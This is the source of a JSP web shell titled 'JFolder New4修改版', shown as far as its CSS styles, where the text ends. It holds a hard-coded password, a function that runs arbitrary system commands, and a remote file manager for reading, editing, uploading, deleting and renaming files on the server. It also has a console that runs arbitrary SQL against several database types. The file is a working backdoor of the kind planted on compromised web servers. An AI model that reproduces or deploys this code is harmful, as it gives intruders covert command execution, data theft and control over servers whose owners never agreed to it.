2.jsp

<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*"%>
<%@ page import="java.util.Map"%>
<%@ page import="java.util.HashMap"%>
<%@ page import="java.nio.charset.Charset"%>
<%@ page import="java.util.regex.*"%>
<%@ page import="java.sql.*"%>
<%!
private String _password = "156156";
private String _encodeType = "GB2312";
private int _sessionOutTime = 20;
private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"};
private Connection _dbConnection = null;
private Statement _dbStatement = null;
private String _url = null;

public boolean validate(String password) {
	if (password.equals(_password)) {
		return true;
	} else {
		return false;
	}
}

public String HTMLEncode(String str) {
	str = str.replaceAll(" ", "&nbsp;");
	str = str.replaceAll("<", "&lt;");
	str = str.replaceAll(">", "&gt;");
	str = str.replaceAll("\r\n", "<br>");
	
	return str;
}

public String Unicode2GB(String str) {
	String sRet = null;
	
	try {
		sRet = new String(str.getBytes("ISO8859_1"), _encodeType);
	} catch (Exception e) {
		sRet = str;
	}
	
	return sRet;
}

public String exeCmd(String cmd) {
	Runtime runtime = Runtime.getRuntime();
	Process proc = null;
	String retStr = "";
	InputStreamReader insReader = null;
	char[] tmpBuffer = new char[1024];
	int nRet = 0;
	
	try {
		proc = runtime.exec(cmd);
		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
		
		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
			retStr += new String(tmpBuffer, 0, nRet);
		}
		
		insReader.close();
		retStr = HTMLEncode(retStr);
	} catch (Exception e) {
		retStr = "<font color=\"red\">bad command \"" + cmd + "\"</font>";
	} finally {
		return retStr;
	}
}

public String pathConvert(String path) {
	String sRet = path.replace('\\', '/');
	File file = new File(path);
	
	if (file.getParent() != null) {
		if (file.isDirectory()) {
			if (! sRet.endsWith("/"))
				sRet += "/";
		}
	} else {
		if (! sRet.endsWith("/"))
			sRet += "/";	
	}
	
	return sRet;
}

public String strCut(String str, int len) {
	String sRet;
	
	len -= 3;
	
	if (str.getBytes().length <= len) {
		sRet = str;
	} else {
		try {
			sRet = (new String(str.getBytes(), 0, len, "GBK")) + "...";
		} catch (Exception e) {
			sRet = str;
		}
	}
	
	return sRet;
}

public String listFiles(String path, String curUri) {
	File[] files = null;
	File curFile = null;
	String sRet = null;
	int n = 0;
	boolean isRoot = path.equals("");
	
	path = pathConvert(path);
	
	try {
		if (isRoot) {
			files = File.listRoots();
		} else {
			try {
				curFile = new File(path);
				String[] sFiles = curFile.list();
				files = new File[sFiles.length];
					
				for (n = 0; n < sFiles.length; n ++) {
					files[n] = new File(path + sFiles[n]);
				}
			} catch (Exception e) {
				sRet = "<font color=\"red\">bad path \"" + path + "\"</font>";
			}
		}
		
		if (sRet == null) {
			sRet = "\n";
			sRet += "<script language=\"javascript\">\n";
			sRet += "var selectedFile = null;\n";
			sRet += "<!--\n";
			sRet += "function createFolder() {\n";
			sRet += "	var folderName = prompt(\"请输入目录名\", \"\");\n";
			sRet += "	if (folderName != null && folderName != false && ltrim(folderName) != \"\") {\n";
			sRet += "		window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFolder&folderName=\" + folderName + \"" + "\";\n";
			sRet += "	}\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function createFile() {\n";
			sRet += "	var fileName = prompt(\"请输入文件名\", \"\");\n";
			sRet += "	if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
			sRet += "		window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=createFile&fileName=\" + fileName + \"" + "\";\n";
			sRet += "	}\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function selectFile(obj) {\n";
			sRet += "	if (selectedFile != null)\n";
			sRet += "		selectedFile.style.backgroundColor = \"#FFFFFF\";\n";
			sRet += "	selectedFile = obj;\n";
			sRet += "	obj.style.backgroundColor = \"#CCCCCC\";\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function change(obj) {\n";
			sRet += "	if (selectedFile != obj)\n";
			sRet += "		obj.style.backgroundColor = \"#CCCCCC\";\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function restore(obj) {\n";
			sRet += "	if (selectedFile != obj)\n";
			sRet += "		obj.style.backgroundColor = \"#FFFFFF\";\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function showUpload() {\n";
			sRet += "	up.style.visibility = \"visible\";\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function copyFile() {\n";
			sRet += "	var toPath = prompt(\"请输入要复制到的目录(绝对路径)\", \"\");\n";
			sRet += "	if (toPath != null && toPath != false && ltrim(toPath) != \"\") {\n";
			sRet += "		document.fileList.action = \"" + curUri + "&curPath=" + path + "&fsAction=copyto&dstPath=" + "\" + toPath;\n";
			sRet += "		document.fileList.submit();\n";
			sRet += "	}\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "function rename() {\n";
			sRet += "	var count = 0;\n";
			sRet += "	var selected = -1;\n";
			sRet += "	for (var i = 0; i < document.fileList.filesDelete.length; i ++) {\n";
			sRet += "		if (document.fileList.filesDelete[i].checked) {\n";
			sRet += "			count ++;\n";
			sRet += "			selected = i;\n";
			sRet += "		}\n";
			sRet += "	}\n";
			sRet += "	if (count > 1)\n";
			sRet += "		alert(\"不能重命名多个文件\");\n";
			sRet += "	else if (selected == -1)\n";
			sRet += "		alert(\"没有选中要重命名的文件\");\n";
			sRet += "	else {\n";
			sRet += "		var newName = prompt(\"请输入新文件名\", \"\");\n";
			sRet += "		if (newName != null && newName != false && ltrim(newName) != \"\") {\n";
			sRet += "			window.location.href = \"" + curUri + "&curPath=" + path + "&fsAction=rename&newName=\" + newName + \"&fileRename=\" + document.fileList.filesDelete[selected].value;";
			sRet += "		}\n";
			sRet += "	}\n";
			sRet += "}\n";
			sRet += "\n";
			sRet += "//-->\n";
			sRet += "</script>\n";
			sRet += "<table width=\"100%\" border=\"0\" cellpadding=\"2\" cellpadding=\"1\">\n";
			sRet += "	<form enctype=\"multipart/form-data\" method=\"post\" name=\"upload\" action=\"" + curUri + "&curPath=" + path + "&fsAction=upload" + "\">\n";
			
			if (curFile != null) {
				sRet += "	<tr>\n";
				sRet += "		<td colspan=\"4\" valign=\"middle\">\n";
				sRet += "			&nbsp;<a href=\"" + curUri + "&curPath=" + (curFile.getParent() == null ? "" : pathConvert(curFile.getParent())) + "\">上级目录</a>&nbsp;";
				sRet += "<a href=\"#\" onclick=\"javascript:createFolder()\">创建目录</a>&nbsp;";
				sRet += "<a href=\"#\" onclick=\"javascript:createFile()\">新建文件</a>&nbsp;";
				sRet += "<a href=\"#\" onclick=\"javascript:document.fileList.submit();\">删除</a>&nbsp;";
				sRet += "<a href=\"#\" onclick=\"javascript:copyFile()\">复制</a>&nbsp;";
				sRet += "<a href=\"#\" onclick=\"javascript:rename()\">重命名</a>&nbsp;";
				sRet += "<a href=\"#\" onclick=\"javascript:showUpload()\">上传文件</a>\n";
				sRet += "<span style=\"visibility: hidden\" id=\"up\"><input type=\"file\" value=\"上传\" name=\"upFile\" size=\"8\" class=\"textbox\" />&nbsp;<input type=\"submit\" value=\"上传\" class=\"button\"></span>\n";
				sRet += "		</td>\n";
				sRet += "	</tr>\n";
			}
			
			sRet += "</form>\n";
			
			sRet += "	<form name=\"fileList\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=deleteFile" + "\">\n";
			
			for (n = 0; n < files.length; n ++) {
				sRet += "	<tr onclick=\"javascript: selectFile(this)\" onmouseover=\"javascript: change(this)\" onmouseout=\"javascript: restore(this)\" style=\"cursor:hand;\">\n";
				
				if (! isRoot) {
					sRet += "		<td width=\"5%\" align=\"center\"><input type=\"checkbox\" name=\"filesDelete\" value=\"" + pathConvert(files[n].getPath()) + "\" /></td>\n";
					if (files[n].isDirectory()) {
						sRet += "		<td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">&lt;" + strCut(files[n].getName(), 50) + "&gt;</a></td>\n";
					} else {
						sRet += "		<td><a title=\"" + files[n].getName() + "\">" + strCut(files[n].getName(), 50) + "</a></td>\n";
					}
					
					sRet += "		<td width=\"15%\" align=\"center\">" + (files[n].isDirectory() ? "&lt;dir&gt;" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<<a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "&fsAction=open" + "\">edit</a>>" : "") + "</td>\n";
					sRet += "		<td width=\"15%\" align=\"center\">" + files[n].length() + "</td>\n";
				} else {
					sRet += "		<td><a href=\"" + curUri + "&curPath=" + pathConvert(files[n].getPath()) + "\" title=\"" + files[n].getName() + "\">" + pathConvert(files[n].getPath()) + "</a></td>\n";
				}
	
				sRet += "	</tr>\n";
			}
			sRet += "	</form>\n";
			sRet += "</table>\n";
		}
	} catch (SecurityException e) {
		sRet = "<font color=\"red\">security violation, no privilege.</font>";
	}
	
	return sRet;
}

public boolean isTextFile(String extName) {
	int i;
	boolean bRet = false;
	
	if (! extName.equals("")) {
		for (i = 0; i < _textFileTypes.length; i ++) {
			if (extName.equals(_textFileTypes[i])) {
				bRet = true;
				break;
			}
		}
	} else {
		bRet = true;
	}
	
	return bRet;
}

public String getExtName(String fileName) {
	String sRet = "";
	int	nLastDotPos;
	
	fileName = pathConvert(fileName);
	
	nLastDotPos = fileName.lastIndexOf(".");
	
	if (nLastDotPos == -1) {
		sRet = "";
	} else {
		sRet = fileName.substring(nLastDotPos + 1);
	}
	
	return sRet;
}

public String browseFile(String path) {
	String sRet = "";
	File file = null;
	FileReader fileReader = null;
	
	path = pathConvert(path);
	
	try {
		file = new File(path);
		fileReader = new FileReader(file);
		String fileString = "";
		char[] chBuffer = new char[1024];
		int ret;
		
		sRet = "<script language=\"javascript\">\n";
		
		while ((ret = fileReader.read(chBuffer, 0, 1024)) != -1) {
			fileString += new String(chBuffer, 0, ret);
		}
		
		sRet += "var wnd = window.open(\"about:blank\", \"_blank\", \"width=600, height=500\");\n";
		sRet += "var doc = wnd.document;\n";
		sRet += "doc.write(\"" + "aaa" + "\");\n";
		
		sRet += "</script>\n";
		
	} catch (IOException e) {
		sRet += "<script language=\"javascript\">\n";
		sRet += "alert(\"打开文件" + path + "失败\");\n";
		sRet += "</script>\n";
	}
	
	return sRet;
}

public String openFile(String path, String curUri) {
	String sRet = "";
	boolean canOpen = false;
	int nLastDotPos = path.lastIndexOf(".");
	String extName = "";
	String fileString = null;
	File curFile = null;
	
	path = pathConvert(path);
	
	if (nLastDotPos == -1) {
		canOpen = true;
	} else {
		extName = path.substring(nLastDotPos + 1);
		canOpen = isTextFile(extName);
	}
	
	if (canOpen) {
		try {
			fileString = "";
			curFile = new File(path);
			FileReader fileReader = new FileReader(curFile);
			char[] chBuffer = new char[1024];
			int nRet;
			
			while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
				fileString += new String(chBuffer, 0, nRet);
			}
			
			fileReader.close();
		} catch (IOException e) {
			fileString = null;
			sRet = "<font color=\"red\">不能打开文件\"" + path + "\"</font>";
		} catch (SecurityException e) {
			fileString = null;
			sRet = "<font color=\"red\">安全问题，没有权限执行该操作</font>";
		}
	} else {
		sRet = "<font color=\"red\">file \"" + path + "\" is not a text file, can't be opened in text mode</font>";
	}
	
	if (fileString != null) {
		sRet += "<script language=\"javascript\">";
		sRet += "<!--\n";
		sRet += "function saveAs() {\n";
		sRet += "	var fileName = prompt(\"请输入文件名\", \"\");\n";
		sRet += "	if (fileName != null && fileName != false && ltrim(fileName) != \"\") {\n";
		sRet += "		document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n";
		sRet += "		document.openfile.submit();\n";
		sRet += "	}\n";
		sRet += "}\n";
		sRet += "//-->\n";
		sRet += "</script>\n";
		sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n";
		sRet += "	<form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path + "&fsAction=save" + "\">\n";
		sRet += "	<tr>\n";
		sRet += "		<td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\">上级目录</a>]</td>\n";
		sRet += "	</tr>\n";
		sRet += "	<tr>\n";
		sRet += "		<td align=\"center\">\n";
		sRet += "			<textarea name=\"fileContent\" cols=\"80\" rows=\"32\">\n";
		sRet += fileString;
		sRet += "			</textarea>\n";
		sRet += "		</td>\n";
		sRet += "	</tr>\n";
		sRet += "	<tr>\n";
		sRet += "		<td align=\"center\"><input type=\"submit\" class=\"button\" value=\"保存\" />&nbsp;<input type=\"button\" class=\"button\" value=\"另存为\" onclick=\"javascript:saveAs()\" /></td>\n";
		sRet += "	</tr>\n";
		sRet += "	</form>\n";
		sRet += "</table>\n";
	}
	
	return sRet;
}

public String saveFile(String path, String curUri, String fileContent) {
	String sRet = "";
	File file = null;
	
	path = pathConvert(path);
	
	try {
		file = new File(path);
		
		if (! file.canWrite()) {
			sRet = "<font color=\"red\">文件不可写</font>";
		} else {
			FileWriter fileWriter = new FileWriter(file);
			fileWriter.write(fileContent);
			
			fileWriter.close();
			sRet = "文件保存成功，正在返回，请稍候……\n";
			sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />\n";	
		}
	} catch (IOException e) {
		sRet = "<font color=\"red\">保存文件失败</font>";
	} catch (SecurityException e) {
		sRet = "<font color=\"red\">安全问题，没有权限执行该操作</font>";
	}
	
	return sRet;
}

public String createFolder(String path, String curUri, String folderName) {
	String sRet = "";
	File folder = null;
	
	path = pathConvert(path);
	
	try {
		folder = new File(path + folderName);
		
		if (folder.exists() && folder.isDirectory()) {
			sRet = "<font color=\"red\">\"" + path + folderName + "\"目录已经存在</font>";
		} else {
			if (folder.mkdir()) {
				sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\"，正在返回，请稍候……\n";
					sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + folderName + "\" />";
			} else {
				sRet = "<font color=\"red\">创建目录\"" + folderName + "\"失败</font>";
			}
		}
	} catch (SecurityException e) {
		sRet = "<font color=\"red\">安全问题，没有权限执行该操作</font>";
	}
	
	return sRet;
}

public String createFile(String path, String curUri, String fileName) {
	String sRet = "";
	File file = null;
	
	path = pathConvert(path);
	
	try {
		file = new File(path + fileName);
		
		if (file.createNewFile()) {
			sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + fileName + "&fsAction=open" + "\" />";
		} else {
			sRet = "<font color=\"red\">\"" + path + fileName + "\"文件已经存在</font>";
		}
	} catch (SecurityException e) {
		sRet = "<font color=\"red\">安全问题，没有权限执行该操作</font>";
	} catch (IOException e) {
		sRet = "<font color=\"red\">创建文件\"" + path + fileName + "\"失败</font>";
	}
	
	return sRet;
} 

public String deleteFile(String path, String curUri, String[] files2Delete) {
	String sRet = "";
	File tmpFile = null;
	
	try {
		for (int i = 0; i < files2Delete.length; i ++) {
			tmpFile = new File(files2Delete[i]);
			if (! tmpFile.delete()) {
				sRet += "<font color=\"red\">删除\"" + files2Delete[i] + "\"失败</font><br>\n";
			}
		}
		
		if (sRet.equals("")) {
			sRet = "删除成功，正在返回，请稍候……\n";
			sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
		}
	} catch (SecurityException e) {
		sRet = "<font color=\"red\">安全问题，没有权限执行该操作</font>\n";
	}
	
	return sRet;
}

public String saveAs(String path, String curUri, String fileContent) {
	String sRet = "";
	File file = null;
	FileWriter fileWriter = null;
	
	try {
		file = new File(path);
		
		if (file.createNewFile()) {
			fileWriter = new FileWriter(file);
			fileWriter.write(fileContent);
			fileWriter.close();
			
			sRet = "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "&fsAction=open" + "\" />";
		} else {
			sRet = "<font color=\"red\">文件\"" + path + "\"已经存在</font>";
		}
	} catch (IOException e) {
		sRet = "<font color=\"red\">创建文件\"" + path + "\"失败</font>";
	}	
	
	return sRet;
}


public String uploadFile(ServletRequest request, String path, String curUri) {
	String sRet = "";
	File file = null;
	InputStream in = null;
	
	path = pathConvert(path);
	
	try {
		in = request.getInputStream();
		
		byte[] inBytes = new byte[request.getContentLength()];
		int nBytes;
		int start = 0;
		int end = 0;
		int size = 1024;
		String token = null;
		String filePath = null;

		//
		// 把输入流读入一个字节数组
		//
		while ((nBytes = in.read(inBytes, start, size)) != -1) {
			start += nBytes;
		}
		
		in.close();
		//
		// 从字节数组中得到文件分隔符号
		//
		int i = 0;
		byte[] seperator;
		
		while (inBytes[i] != 13) {
			i ++;
		}
		
		seperator =  new byte[i];
	
		for (i = 0; i < seperator.length; i ++) {
			seperator[i] = inBytes[i];
		}
		
		//
		// 得到Header部分
		//
		String dataHeader = null;
		i += 3;
		start = i;
		while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) {
			i ++;
		}
		end = i - 1;
		dataHeader = new String(inBytes, start, end - start + 1);
		
		//
		// 得到文件名
		//
		token = "filename=\"";
		start = dataHeader.indexOf(token) + token.length();
		token = "\"";
		end = dataHeader.indexOf(token, start) - 1;
		filePath = dataHeader.substring(start, end + 1);
		filePath = 	pathConvert(filePath);
		String fileName = filePath.substring(filePath.lastIndexOf("/") + 1);
		
		//
		// 得到文件内容开始位置
		//	
		i += 4;
		start = i;
		
		/*
		boolean found = true;		
		byte[] tmp = new byte[seperator.length];
		while (i <= inBytes.length - 1 - seperator.length) {
		
			for (int j = i; j < i + seperator.length; j ++) { 
				if (seperator[j - i] != inBytes[j]) {
					found = false;
					break;
				} else
					tmp[j - i] = inBytes[j];
			}
			
			if (found)
				break;
			
			i ++;
		}*/
		
		//
		// 偷懒的办法
		//
		end = inBytes.length - 1 - 2 - seperator.length - 2 - 2;
		
		//
		// 保存为文件
		//
		File newFile = new File(path + fileName);
		newFile.createNewFile();
		FileOutputStream out = new FileOutputStream(newFile);
		
		//out.write(inBytes, start, end - start + 1);
		out.write(inBytes, start, end - start + 1);
		out.close();
		
		sRet = "<script language=\"javascript\">\n";
		sRet += "alert(\"文件上传成功" + fileName + "\");\n";
		sRet += "</script>\n";
	} catch (IOException e) {
		sRet = "<script language=\"javascript\">\n";
		sRet += "alert(\"文件上传失败\");\n";
		sRet += "</script>\n";
	}
	
	sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
	return sRet;
}

public boolean fileCopy(String srcPath, String dstPath) {
	boolean bRet = true;
	
	try {
		FileInputStream in = new FileInputStream(new File(srcPath));
		FileOutputStream out = new FileOutputStream(new File(dstPath));
		byte[] buffer = new byte[1024];
		int nBytes;
		

		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
			out.write(buffer, 0, nBytes);
		}
		
		in.close();
		out.close();
	} catch (IOException e) {
		bRet = false;
	}	
	
	return bRet;
}

public String getFileNameByPath(String path) {
	String sRet = "";
	
	path = pathConvert(path);
	
	if (path.lastIndexOf("/") != -1) {
		sRet = path.substring(path.lastIndexOf("/") + 1);
	} else {
		sRet = path;
	}
	
	return sRet;
}

public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) {
	String sRet = "";
	int i;
	
	path = pathConvert(path);
	dstPath = pathConvert(dstPath);
	
	for (i = 0; i < files2Copy.length; i ++) {
		if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) {
			sRet += "<font color=\"red\">文件\"" + files2Copy[i] + "\"复制失败</font><br/>";
		}
	}
	
	if (sRet.equals("")) {
		sRet = "文件复制成功，正在返回，请稍候……";
		sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
	}
	
	return sRet;
}

public boolean isFileName(String fileName) {
	boolean bRet = false;
	
	Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$");
	Matcher m = p.matcher(fileName);
	
	bRet = m.matches();
	
	return bRet;
}

public String renameFile(String path, String curUri, String file2Rename, String newName) {
	String sRet = "";
	
	path = pathConvert(path);
	file2Rename = pathConvert(file2Rename);
	
	try {
		File file = new File(file2Rename);
		
		newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName;
		File newFile = new File(newName);
		
		if (! file.exists()) {
			sRet = "<font color=\"red\">文件\"" + file2Rename + "\"不存在</font>";
		} else {
			file.renameTo(newFile);
			sRet = "文件重命名成功，正在返回，请稍候……";
			sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
		}
	} catch (SecurityException e) {
		sRet = "<font color=\"red\">安全问题导致文件\"" + file2Rename + "\"复制失败</font>";
	}
	
	return sRet;
}

public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
	boolean bRet = true;
	String driverName = "";
	
	if (dbServer.equals(""))
		dbServer = "localhost";
	
	try {
		if (dbType.equals("sqlserver")) {
			driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
			if (dbPort.equals(""))
				dbPort = "1433";
			_url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
		} else if (dbType.equals("mysql")) {
			driverName = "com.mysql.jdbc.Driver";
			if (dbPort.equals(""))
				dbPort = "3306";
			_url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
		} else if (dbType.equals("odbc")) {
			driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
			_url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
		} else if (dbType.equals("oracle")) {
			driverName = "oracle.jdbc.driver.OracleDriver";
			_url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
		} else if (dbType.equals("db2")) {
			driverName = "com.ibm.db2.jdbc.app.DB2Driver";
			_url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
		}
		
		Class.forName(driverName);
	} catch (ClassNotFoundException e) {
		bRet = false;
	}
	
	return bRet;
}

public boolean DBConnect(String User, String Password) {
	boolean bRet = false;
	
	if (_url != null) {
		try {
			_dbConnection = DriverManager.getConnection(_url, User, Password);
			_dbStatement = _dbConnection.createStatement();
			bRet = true; 
		} catch (SQLException e) {
			bRet = false;
		}	
	} 
	
	return bRet;
}

public String DBExecute(String sql) {
	String sRet = "";
	
	if (_dbConnection == null || _dbStatement == null) {
		sRet = "<font color=\"red\">数据库没有正常连接</font>";
	} else {
		try {
			if (sql.toLowerCase().substring(0, 6).equals("select")) {
				ResultSet rs = _dbStatement.executeQuery(sql);
				ResultSetMetaData rsmd = rs.getMetaData();
				int colNum = rsmd.getColumnCount();
				int colType;
				
				sRet = "sql语句执行成功，返回结果<br>\n";
				sRet += "<table align=\"center\" border=\"0\" bgcolor=\"#CCCCCC\" cellpadding=\"2\" cellspacing=\"1\">\n";
				sRet +=	"    <tr bgcolor=\"#FFFFFF\">\n";
				for (int i = 1; i <= colNum; i ++) {
					sRet += "        <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n";
				}
				sRet += "    </tr>\n";
				while (rs.next()) {
					sRet += "	<tr bgcolor=\"#FFFFFF\">\n";
					for (int i = 1; i <= colNum; i ++) {
						colType = rsmd.getColumnType(i);
						
						sRet += "		<td>";
						switch (colType) {
							case Types.BIGINT:
							sRet += rs.getLong(i);
							break;
							
							case Types.BIT:
							sRet += rs.getBoolean(i);
							break;
							
							case Types.BOOLEAN:
							sRet += rs.getBoolean(i);
							break;
							
							case Types.CHAR:
							sRet += rs.getString(i);
							break;
							
							case Types.DATE:
							sRet += rs.getDate(i).toString();
							break;
							
							case Types.DECIMAL:
							sRet += rs.getDouble(i);
							break;
							
							case Types.NUMERIC:
							sRet += rs.getDouble(i);
							break;
							
							case Types.REAL:
							sRet += rs.getDouble(i);
							break;
							
							case Types.DOUBLE:
							sRet += rs.getDouble(i);
							break;
							
							case Types.FLOAT:
							sRet += rs.getFloat(i);
							break;
							
							case Types.INTEGER:
							sRet += rs.getInt(i);
							break;
							
							case Types.TINYINT:
							sRet += rs.getShort(i);
							break;
							
							case Types.VARCHAR:
							sRet += rs.getString(i);
							break;
							
							case Types.TIME:
							sRet += rs.getTime(i).toString();
							break;
							
							case Types.DATALINK:
							sRet += rs.getTimestamp(i).toString();
							break;
						}
						sRet += "		</td>\n";
					}
					sRet += "	</tr>\n"; 
				}				
				sRet += "</table>\n";
				
				rs.close();
			} else {
				if (_dbStatement.execute(sql)) {
					sRet = "sql语句执行成功";
				} else {
					sRet = "<font color=\"red\">sql语句执行失败</font>";
				}
			}
		} catch (SQLException e) {
			sRet = "<font color=\"red\">sql语句执行失败</font>";
		}
	}
	
	return sRet;
}

public void DBRelease() {
	try {
		if (_dbStatement != null) {
			_dbStatement.close();
			_dbStatement = null;
		}
		
		if (_dbConnection != null) {
			_dbConnection.close();
			_dbConnection = null;
		}
	} catch (SQLException e) {
	
	}
}

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////

class JshellConfig {
	private String _jshellContent = null;
	private String _path = null;

	public JshellConfig(String path) throws JshellConfigException {
		_path = path;
		read();
	}
	
	private void read() throws JshellConfigException {
		try {
			FileReader jshell = new FileReader(new File(_path));
			char[] buffer = new char[1024];
			int nChars;
			_jshellContent = "";
			
			while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
				_jshellContent += new String(buffer, 0, nChars);
			}
			
			jshell.close();
		} catch (IOException e) {
			throw new JshellConfigException("打开文件失败");
		}
	}
	
	public void save() throws JshellConfigException {
		FileWriter jshell = null;
	
		try {
			jshell = new FileWriter(new File(_path));
			char[] buffer = _jshellContent.toCharArray();
			int start = 0;
			int size = 1024;
			
			for (start = 0; start < buffer.length - 1 - size; start += size) {
				jshell.write(buffer, start, size);
			}
			
			jshell.write(buffer, start, buffer.length - 1 - start);
		} catch (IOException e) {
			new JshellConfigException("写文件失败");
		} finally {
			try {
				jshell.close();
			} catch (IOException e) {
			
			}
		}
	}
	
	public void setPassword(String password) throws JshellConfigException {
		Pattern p = Pattern.compile("\\w+");
		Matcher m = p.matcher(password);
		
		if (! m.matches()) {
			throw new JshellConfigException("密码不能有除字母数字下划线以外的字符");
		}
		
		p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
		m = p.matcher(_jshellContent);
		if (! m.find()) {
			throw new JshellConfigException("程序体已经被非法修改");
		}
		
		_jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
		
		//return HTMLEncode(_jshellContent);
	}
	
	public void setEncodeType(String encodeType) throws JshellConfigException {
		Pattern p = Pattern.compile("[A-Za-z0-9]+");
		Matcher m = p.matcher(encodeType);
		
		if (! m.matches()) {
			throw new JshellConfigException("编码格式只能是字母和数字的组合");
		}
		
		p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
		m = p.matcher(_jshellContent);
		
		if (! m.find()) {
			throw new JshellConfigException("程序体已经被非法修改");
		}
		
		_jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
		//return HTMLEncode(_jshellContent);
	}
	
	public void setSessionTime(String sessionTime) throws JshellConfigException {
		Pattern p = Pattern.compile("\\d+");
		Matcher m = p.matcher(sessionTime);
		
		if (! m.matches()) {
			throw new JshellConfigException("session超时时间只能填数字");
		}
		
		p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
		m = p.matcher(_jshellContent);
		
		if (! m.find()) {
			throw new JshellConfigException("程序体已经被非法修改");
		}
		
		_jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
		//return HTMLEncode(_jshellContent);
	}
	
	public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
		Pattern p = Pattern.compile("\\w+");
		Matcher m = null;
		int i;
		String fileTypes = "";
		String tmpFileTypes = "";
		
		for (i = 0; i < textFileTypes.length; i ++) {
			m = p.matcher(textFileTypes[i]);
			
			if (! m.matches()) {
				throw new JshellConfigException("扩展名只能是字母数字和下划线的组合");
			}
			
			if (i != textFileTypes.length - 1)
				fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
			else
				fileTypes += "\"" + textFileTypes[i] + "\"";
		}
		
		for (i = 0; i < _textFileTypes.length; i ++) {
			if (i != _textFileTypes.length - 1)
				tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
			else
				tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
		}
		
		p = Pattern.compile(tmpFileTypes);
		m = p.matcher(_jshellContent);
		
		if (! m.find()) {
			throw new JshellConfigException("程序文件已经被非法修改");
		}
		
		_jshellContent = m.replaceAll(fileTypes);
		
		//return HTMLEncode(_jshellContent);
	}
	
	public String getContent() {
		return HTMLEncode(_jshellContent);
	}
}

class JshellConfigException extends Exception {
	public JshellConfigException(String message) {
		super(message);
	}
}
%>
<html>
<head>
<title>JFolder New4修改版</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
<style>
body {
	font-size: 14px;
	font-family: 宋体;
	background-color: #CCCCCC;
}
td {
	font-size: 14px;
	font-family: 宋体;
}

input.textbox {
	border: black solid 1;
	font-size: 12px;
	height: 18px;
}

input.button {
	font-size: 12px;
	font-family: 宋体;
	border: black solid 1;
}

td.datarows {
	font-size: 14px;
	font-family: 宋体;
	height: 25px;
}

textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
